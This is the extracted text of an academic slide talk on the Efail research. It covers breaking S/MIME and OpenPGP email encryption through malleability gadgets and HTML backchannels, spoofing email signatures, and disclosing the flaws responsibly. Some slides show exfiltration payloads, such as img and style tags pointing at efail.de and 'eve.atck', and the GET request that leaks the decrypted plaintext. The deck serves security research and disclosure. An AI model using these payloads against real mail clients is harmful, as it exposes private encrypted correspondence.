Efail attack and its implications
Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2
Juraj Somorovsky
About this talk
• Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018
• Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email. Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019
Internet Message Format („Email“)
4
From: Alice
To: Bob
Subject: Breaking News
Congratulations, you have been promoted!
Multipurpose Internet Mail Extensions (MIME)
5
From: Alice
To: Bob
Subject: Breaking News
Content-Type: text/plain
Congratulations, you have been promoted!
Multipurpose Internet Mail Extensions (MIME)
6
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/mixed; boundary="BOUNDARY"
--BOUNDARY
Content-type: text/plain
Congratulations, you have been promoted!
--BOUNDARY
Content-type: application/pdf
Contract...
--BOUNDARY--
Motivation for using end-to-end encryption
Insecure Transport• TLS might be used – we don’t know!
Nation state attackers (see also lecture given by Tibor)• Massive collection of emails
• Snowden’s global surveillance disclosure
Breach of email provider / email account• Single point of failure
• Aren’t they reading/analyzing my emails anyway?
12
Two competing standards
OpenPGP (RFC 4880)
• Favored by privacy advocates
• Web-of-trust (no authorities)
S/MIME (RFC 5751)
• Favored by organizations
• Multi-root trust-hierarchies
13
Signed Email (S/MIME)
14
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/signed; boundary="BOUNDARY“;
protocol="application/pkcs7-signature“
--BOUNDARY
Content-type: text/plain
Congratulations, you have been promoted!
--BOUNDARY
Content-Type: application/pkcs7-signature
Content-Transfer-Encoding: base64
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…
OlA9pggcyAAAAAAAAA==
--BOUNDARY--
Signed Email (S/MIME)
15
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/signed; boundary="BOUNDARY“;
protocol="application/pkcs7-signature“
--BOUNDARY
Content-type: text/plain
Congratulations, you have been promoted!
--BOUNDARY
Content-Type: application/pkcs7-signature
Content-Transfer-Encoding: base64
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…
OlA9pggcyAAAAAAAAA==
--BOUNDARY--
Signed Email (S/MIME)
16
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/signed; boundary="BOUNDARY“;
protocol="application/pkcs7-signature“
--BOUNDARY
Content-type: text/plain
Congratulations, you have been promoted!
--BOUNDARY
Content-Type: application/pkcs7-signature
Content-Transfer-Encoding: base64
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…
OlA9pggcyAAAAAAAAA==
--BOUNDARY--
Signed Email (PGP)
17
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/signed; boundary="BOUNDARY";
protocol="application/pgp-signature“
--BOUNDARY
Content-type: text/plain
Congratulations, you have been promoted!
--BOUNDARY
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
iQE/BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX…
-----END PGP SIGNATURE-----
--BOUNDARY--
Encrypted Email (PGP)
18
From: Alice
To: Bob
Subject: Breaking News
Content-Type: multipart/encrypted; boundary="BOUNDARY";
protocol="application/pgp-encrypted";
--BOUNDARY
Content-Type: application/octet-stream; name="encrypted.asc"
Content-Description: OpenPGP encrypted message
Content-Disposition: inline; filename="encrypted.asc"
-----BEGIN PGP MESSAGE-----
hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn
DgkUPQEgJJJq/K1TwyAvR8tSLq…
-----END PGP MESSAGE-----
--BOUNDARY--
Known limitations!
Usability
Snowden EffektEnigmailNew keys at keyserverHard for S/MIME
Opsec von Snowden und thegruqVer- und Entschlüsselung nur in separater
Anwendung!
19
New published PGP public keys per month
?
• https://vimeo.com/56881481
• https://gist.github.com/grugq/03167bed45e774551155
Some tutorials recommend using PGP outside of email client.
Others recommendedEnigmail in defaultsettings (i.e. HTMLswitched on)
PGP and OpSec
20
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
23
2014: Enigmail won’t encrypt.
24
https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/
25
2017: Outlook includes plaintext in encrypted email.
https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/
2018: Enigmail/PEP won‘t encrypt.
26
https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html
Both standards use old crypto
Ciphertext C = Enc(M)
C1
valid/invalid
M = Dec(C)
C2
valid/invalid
…(repeated several times)
Both standards use old crypto
27
Old crypto has no negative impact
CBC / CFB modes of operation used, but their usage is not exploitable
29
Assumption: Email is non-interactive
Old crypto has no negative impact
Backchannel
• Any functionality that forces the email client to interact with the network
• HTML/CSS
• JavaScript
• Email header
• Attachment preview
• Certificate verification
30
<img src="http://efail.de"><object data="ftp://efail.de"><style>@import '//efail.de'</style>...XSS cheat sheetsDisposition-Notification-To: [email protected]: http://efail.deX-Image-URL: http://efail.de…OCSP, CRL, intermediate certsPDF, SVG, VCards, etc.
Windows
Linux
macOS
iOS
Android
Webmail
Webapp
OutlookIBM Notes
PostboxFoxmail
Live MailPegasus
The Bat!Mulberry
eM Client
Thunderbird
EvolutionKMailTrojitá
ClawsMutt
Apple Mail Airmail MailMate
Mail App CanaryMail Outlook
K-9 MailR2Mail
MailDroidNine
GMailOutlook.com
Yahoo!iCloud
GMXHushMail
Mail.ruFastMail
Roundcube
RainLoop AfterLogicHorde IMP
ProtonMailMailfence
MailboxZoHo Mail
leak by defaultask user leak via bypass script execution
Backchannelsfound
W8MailW10MailWLMail
Mailpile
Exchange GroupWise
Evaluation of backchannels in email clients
31
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
34
S/MIME uses CBC
• Cipher Block Chaining mode of operation
• Not authenticated
• Vulnerable to many attacks (TLS, XML Encryption, SSH)
• Basic problem: malleability
Source: wikipedia
Malleability of CBC
39
C0 ⊕ P0
decryption
0000000000000000
C1
P0'
decryption
xt/html\nDear Bob
C2
P1
CBC Gadget
Malleability of CBC
40
C0 ⊕ P0⊕ Pc
decryption
<img src=”ev.il/
C1
P0'
decryption
xt/html\nDear Bob
C2
P1
Practical Attack against S/MIME
43
???????????????? <img "
Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi
???????????????? " src="efail.de/
???????????????? Content-type: te xt/html\nDear Sir or Madam, the se
???????????????? ">
Original
Crafted
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
46
OpenPGP
• OpenPGP uses a variation of CFB-Mode
• Uses integrity protection with MDC (Modification Detection Code)
• Compression is enabled by default
48
Ci
Pi (known)
Ci+1
Pi-1
encryption encryption
XCi
encryption
Pc (chosen) random plaintext? ? ? ? ? ? ? ?
encryption
Defeating integrity protection
50
Vulnerable Not Vulnerable
Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE
Outlook 2007 GPG4WIN 3.0.0
Outlook 2010 GPG4WIN
Outlook 2013 GPG4WIN
Outlook 2016 GPG4WIN
Thunderbird Enigmail 1.9.9
Apple Mail (OSX) GPGTools 2018.01
MDC Stripped MDC Incorrect SEIP -> SE
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
56
Direct exfiltration
• This attack is possible since 2003 in Thunderbird
• Independent of the applied encryption scheme
• Somewhat fixable in implementation
• But works directly in …• Apple Mail / Mail App
• Thunderbird
• Postbox
• …
• The standards do not give any definition for that!
57
Encrypting
Alice writes a Mail to Bob
From: Alice
To: Bob
Dear Bob,
the meeting tomorrow will be
at 9 o‘clock.
-----BEGIN PGP MESSAGE-----
hQIMA1n/0nhVYSIBARAAiIsX1QsH
ZObL2LopVexVVZ1uvk3wieArHUg…
-----END PGP MESSAGE-----
Alice’s mail program encrypts the email
Direct exfiltration
58
Original E-Mail
Eve’s attack E-Mail
Content-Type: text/html
<img src="http://eve.atck/
Content-Type: text/html
">
From: Eve
To: Bob
From: Alice
To: Bob
Eve modifies the email and sends it to Bob or AliceEve captures the encrypted mail between Alice and Bob
-----BEGIN PGP MESSAGE-----
hQIMA1n/0nhVYSIBARAAiIsX1QsH
ZObL2LopVexVVZ1uvk3wieArHUg…
-----END PGP MESSAGE-----
Direct exfiltration
59
Bob’s mail program decrypts the email
Decrypting
Eve’s attack E-Mail
Content-Type: text/html
<img src="http://eve.atck/
Content-Type: text/html
">
From: Eve
To: Bob
Bob’s mail program puts the clear text back into the body
-----BEGIN PGP MESSAGE-----
hQIMA1n/0nhVYSIBARAAiIsX1QsH
ZObL2LopVexVVZ1uvk3wieArHUg…
-----END PGP MESSAGE-----
Dear Bob,
the meeting tomorrow will be
at 9 o‘clock.
Direct exfiltration
60
Eve’s attack E-Mail
Content-Type: text/html
<img src="http://eve.atck/
Content-Type: text/html
">
Dear Bob,
the meeting tomorrow will be
at 9 o‘clock.
Content-Type: text/html
<img
src="http://eve.atck/Dear
Bob,
the meeting tomorrow will be
at 9 o‘clock.“>
From: Eve
To: Bob
GET /Dear%20Bob%2C%0D%0Athe
%20meeting%20tomorrow%20will
%20be%20at%209%20o%E2%80%98c
lock.
Eve
Direct exfiltration
61
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
62
Exfiltrating many emails
Recap:
• Attacker can exfiltrate hundreds of S/MIME or OpenPGP ciphertexts
with single malicious email.
• Victim merely needs to open the email.
• In May 2018, two widely used clients (Apple Mail and Thunderbird)
either
• weren‘t patched or
• patches were insufficient
64
68
An independent
summary of the
disclosure timeline,
compiled from
public information.
http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html
Disclosure; lessons learnt
1. Stick to a 90 day disclosure deadline.
2. Be careful with disclosure pre-announcements, because:
• People will speculate about the details and
a) underrate/overrate the risk, and
b) spread false information.
• you won‘t be in control of communicating the details.
3. Controlling information flow right after disclosure is essential.
70
Having a website with general information is necessary (logo ???)
S/MIME Version 4.0 (RFC 8551)
• References EFAIL paper
• Recommends the usage of authenticated encryption with AES-GCM
72
OpenPGP - draft-ietf-openpgp-rfc4880bis-07
• Deprecates Symmetrically Encrypted (SE) data packets
• Proposes AEAD protected data packets
• Implementations should not allow users to access erroneous data
75
How about signatures?
• Encrypt-then-sign?
• Sign-then-encrypt?
…and of course, there are also different problems
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
77
Motivation
• We already broke email encryption
• The systems are set up;• Configuring S/MIME and PGP is the most challenging part of our research
• How about email signatures?
Signature Spoofing
We attack the presentation and interpretation of email signatures.
We do not attack the underlying cryptography.
80
As a cryptographer, you should consider this as a neat warning that strong crypto is not everything
Methodology
• 25 clients• PGP and S/MIME• All major platforms
• Developed 5 attack classes:• 3 common• 1 specific to PGP• 1 specific to S/MIME
• Considered 3 forgery classes
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
86
UI Redressing – Causes
• HTML and CSS support in email clients
• Security indicators in mail body• Often implemented by third-party plugin• Intuitive (signature assigned to plaintext)
89
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
92
Identity Binding Attacks
95
Eve <[email protected]>From:
Displayed senderVerification logic
RFC 5322 display names
Identity Binding Attacks
96
From: [email protected]
From: [email protected]
From: [email protected] <[email protected]>
Displayed senderVerification logic
From: [email protected]
Sender: [email protected]
Reply-to: [email protected]
Multiple headers
Identity Binding Attacks
97
From: [email protected] [ whitespace ] <[email protected]>
[valid signature by [email protected]]
Identity Binding Attacks – Causes & Countermeasures
• Functional features (Sender, From) have becomesecurity relevant
• Explicitly showing signer details shifts problem to user
98
1. Breaking Email Encryption
1. Malleability Gadget Attacks on S/MIME
2. Malleability Gadget Attacks on OpenPGP
3. Direct Exfiltration Attacks
4. Responsible Disclosure
2. Breaking Email Signatures
1. UI Redressing
2. Identity Binding
3. Conclusions
Overview
107
Conclusions
• Introduced malleability gadgets and backchannels
• Self-exfiltrating plaintexts; applicable to different standards as well
• Crypto standards need to evolve• Current S/MIME is broken
• OpenPGP needs clarification
• Signed emails have problems as well
• Crypto standards are not only about strong cryptographic algorithms
• Secure HTML email is challenging
108